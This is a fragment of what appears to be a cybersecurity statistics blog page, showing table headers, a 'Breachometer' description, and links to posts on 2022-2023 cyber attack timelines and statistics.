Description
Attack
Target Class
Attack Class
Country
Link
Tags
SUPPORT MY WORK!
BREACHOMETER
The “Breachometer” compares the current number of events/day with the max and min values recorded in the previous 12 months.
Leaky Buckets in 2023
Cloud-Native Threats in 2023
16-28 February 2023 Cyber Attacks Timeline
2022 Cyber Attacks Statistics
February 2023 Cyber Attacks Statistics
